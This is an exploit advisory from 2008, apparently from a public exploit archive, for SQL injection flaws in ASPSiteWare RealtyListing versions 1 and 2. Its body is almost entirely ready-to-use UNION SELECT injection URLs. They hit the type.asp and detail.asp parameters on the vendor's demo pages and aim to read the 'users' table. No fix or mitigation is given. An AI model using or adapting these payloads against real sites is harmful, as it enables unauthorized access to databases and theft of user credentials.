ASPSiteWare RealtyListing V1-V2 SQL Injection Vulnerabilities

2008-12-14 06:00:05

############################################################################-------------------------------AlpHaNiX----------------------------------#############################################################################Found By : AlpHaNiX#website : www.offensivetrack.org#contact : AlpHa[AT]HACKER[DOT]BZ############################################################################script : RealtyListing V1/V2#download : null#Demo : http://www.aspsiteware.com/Realty1 http://www.aspsiteware.com/realty2/realty2/############################################################################Exploits :--=[SQL INJECTION]=--http://www.aspsiteware.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#http://www.aspsiteware.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#http://www.aspsiteware.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+usershttp://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users############################################################################

Fixes

No fixes

In order to submit a new fix you need to be registered.